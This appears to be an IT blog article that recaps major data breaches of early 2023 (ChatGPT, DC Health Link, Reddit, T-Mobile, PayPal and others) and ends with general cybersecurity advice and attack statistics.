IT Tips & Tricks
Recent Malware Attacks: First Quarter 2023
2 May 2023
The cybersecurity landscape is ever-changing. While ransomware attacks continue, this article looks at who was hit — and how — in the first quarter of 2023, the evolving nature of cyber-attacks, and some suggestions for your cyber safety. With upward of 2,200 attacks every day, this is by no means a complete record of every malware attack or cyber-attack that occurred during this three-month period but tracks some of the most significant or surprising incidents.
The only better time to beef up security has already passed.
24 March: Despite the growing popularity of OpenAI’s ChatGPT, they have not been immune to a security breach. A bug found in ChatGPT’s open-source library caused the chatbot to leak the personal data of customers, including credit card information and the titles of some chats they’d initiated.
Following the incident, OpenAI released the following statement: “In the hours before we took ChatGPT offline, it was possible for some users to see another active user’s first and last name, email address, payment address, the last four digits (only) of a credit card number, and credit card expiration date. Full credit card numbers were not exposed at any time.” We hope the latter was of some consolation to those whose information was exposed.
9 March: On 9 March, DC Health Link, a Washington DC-based healthcare provider was breached. DC Health Link handles sensitive data relevant to a number of federal legislators and their families. The breach may have affected up to 170,000 people. US House Chief Administrative Officer, Catherine L. Szpindor, confirmed that Personally Identifiable Information (PII) of members of Congress, their families, and their staff had been exposed.
A Russian threat actor attempted to sell the House Members’ data on a hackers forum in exchange for cryptocurrency.
House Leader, Kevin McCarthy, and Minority Leader, Hakim Jeffries, confirmed that the FBI had successfully purchased the information as part of their law enforcement operation. This provided a clear picture of the nature of the information that had been leaked, allowing for greater damage control.
21 February: The makers of the Call of Duty game suffered a data breach with sensitive employee data and content schedules exfiltrated from the company’s computer systems by a cyber-criminal. Although the breach occurred in December 2022, it was only revealed to the public much later.
Even members of the US Congress, the legislative branch of the US federal government, have suffered the consequences of a breach.
Image credit of nationalaffairs.com
An employee’s credentials were allegedly obtained in a phishing attack and subsequently used to infiltrate the system.
15 February: Australian software company, Atlassian, suffered a serious data breach. A hacking group claims to have gained entry to the company’s systems and extracted data pertaining to staff, plus floor plans for offices in San Francisco and Sydney. Included in the dataset are the names, email addresses, the departments that staff work in, and other information relating to their employment at Atlassian.
In a statement released by the company, they claimed that the hackers had succeeded in obtaining “an Atlassian employee’s credentials that had been mistakenly posted in a public repository by the employee.”
10 February: Social media company, Reddit, suffered a data breach in early February. Reddit CTO, Christopher Slowe, explained, “After successfully obtaining a single employee’s credentials, the attacker gained access to some internal docs, code, as well as some internal dashboards and business systems.”
Slowe stated that there were “no indications of breach of our primary production systems (the parts of our stack that run Reddit and store the majority of our data),” but confirmed that limited contact information for company contacts and employees (both current and former), as well as limited advertiser information were all accessed.
8 February: US-based Asian and Hispanic food delivery service, Weee!, had the personal information of 1.1 million customers exposed in a data breach. Some of the leaked data was posted on a hackers forum. The food delivery company claimed that no customer financial data was exposed because Weee! “does not retain any payment information.”
6 February: Sharp HealthCare, the largest healthcare provider in San Diego, California, was forced to notify 62,777 patients that their personal information had been exposed in a malware attack on the organization’s website. Social Security numbers, health insurance data, and health records had all been compromised. Sharp, however, claims that no bank account or credit card information was stolen.
30 January: Up to 10 million people may have had their personal information accessed by hackers after a data breach at UK-based fashion retailer, JD Sports. CFO Neil Greenhalgh advised customers “to be vigilant about potential scam emails, calls, and texts” while the company also provided “details on how to report these.”
26 January: Imagine having to inform your subscribers and employees that their sensitive personal data had been exposed in a cyberattack — ten months earlier! Social Security numbers, credit card and financial account numbers, access codes, and PIN numbers belonging to close to 2,000 people in the Vice Media network were compromised. The attack seems to have been initiated via a compromised employee email account.
19 January: T-Mobile suffered another data breach, which affected about 37 million customers who had their data accessed by hackers. Following T-Mobile’s 2022 attack in which 76 million customers had their data compromised, the company pledged that it would spend $150 million to upgrade its data security.
PayPal, arguably the world’s biggest payment provider, with more than 429 million customers, suffered a breach in January 2023.
The January attack raises questions about whether this has been money well spent. (For one of the gals in our copywriting department, the answer is a resounding “No.” T-Mobile’s $150 million pledge has not prevented her from having to replace — twice — her bank cards, passwords, and any other information T-Mobile had stored. “With that kind of money,” she said, “they could have given each of us around $4 million on this last breach. That would have made me feel much better about the whole thing.”)
18 January: This was a busy day in terms of cyber-attacks. First, MailChimp got hit — just six months after its previous breach. Access to its systems was gained through a social engineering attack, says MailChimp. Since this is startlingly similar to their previous breach, it has certainly cast doubts on the company’s security protocols.
On the same day, PayPal issued a letter to its customers informing them that “unauthorized parties” had accessed PayPal customer accounts using stolen login credentials, but that there was no evidence that customer credentials had been stolen from PayPal’s systems. That should offer peace of mind to the more than 429 million people PayPal claims as customers.
6 January: Following what the company considered “suspicious activity linked to a number of customer accounts,” Chick-fil-A published information on what course of action customers should take if they noticed suspicious activity on their accounts, and advised customers to remove any stored payment methods on their Chick-fil-A account.
4 January: Twitter had a big leak back in 2022. Twitter confirmed that the data breach occurred when hackers used a zero-day API (Application Programming Interface) vulnerability to collect data by submitting an email address or phone number, verifying that it was associated with a Twitter account, and then retrieving the associated account ID. Even though the leak was fixed by January, a bank of email addresses belonging to around 200 million Twitter users is still being circulated on the dark web for as little as $2 per address.
Despite the growing popularity of OpenAI’s ChatGPT, they have not been immune to a security breach.
Scorecards and Solutions
In case you weren’t keeping a tally of exactly how each of these breaches occurred, it breaks down as follows. Eight of these organizations were hacked either through their websites, their own systems, or via bugs that allowed infiltration. The remaining five had their data accessed through employee email accounts or stolen employee credentials. That means 62% of breaches originated via a website or organizational system and 38% of attacks leveraged employee email accounts or credentials.
Clearly, beefing up organizational cybersecurity should be a top priority, followed immediately by increased security of employee email accounts and ongoing education of employees.
It’s worth bearing in mind that of all detections indexed by CrowdStrike Security in the 2021 fourth quarter, 62% were malware-free. This is a growing trend among hackers.
Personally Identifiable Information of members of Congress, their families, and their staff had been exposed.
LOTL (Living Off The Land) is a phenomenon in which “hackers accomplish their objective without writing any malware to the endpoint. Instead, they use your computer’s legitimate tools and processes in a deliberate effort to evade detection by legacy antivirus products.” For a more in-depth look at this topic, see the article, Cybersecurity Tips: Get Off the Fence About Defense.
If you’re looking at increasing your cybersecurity, you might also glean some handy tips from this article: New Alert: 16 Smart Steps for Increased Cybersecurity.
Another excellent cybersecurity resource is the US Cybersecurity & Infrastructure Security Agency, CISA.
As far as employee email accounts are concerned, your mantra should be “multifactor authentication, multifactor authentication, multifactor authentication.” (If you get bombarded with the usual, “Oh, it’s so inconvenient!” by the users, just remind them that so is not having a job.)
If you have bosses that still downplay the need for increased cybersecurity, perhaps sharing these 2023 stats with them might motivate buy-in.
Top Cybersecurity Statistics 2023 (Thus Far!)
- Number of cyber-attacks, first quarter 2023: 200,000.
- Every 39 seconds, there is a hacker attack.
- 300,000 new malware applications — viruses, adware, Trojans, keyloggers and so forth — are created every day.
- Healthcare remains the top target of ransomware attacks.
- 92% of malware was delivered via email.
- 1 million websites have malware at any given time.
- 49 days is the average time it takes to identify a ransomware attack.
- $29M was stolen from a financial tech company by a single hacker.
- $320 million worth of cryptocurrency was stolen in hacks in the first quarter of 2023.
- 66% of CIOs say they plan to increase investment in cybersecurity.
If your bosses fall into that 66% mentioned above, remind them that the only better time to beef up security has already passed.
Our next roundup will be at the end of the second quarter of 2023. Hopefully, there’ll be less to report. Until then, stay safe, shields up, and good luck!
If only Call of Duty’s Modern Warfare applied to cyberattacks. We’d all play, right?
Feel free to share this article on your social media: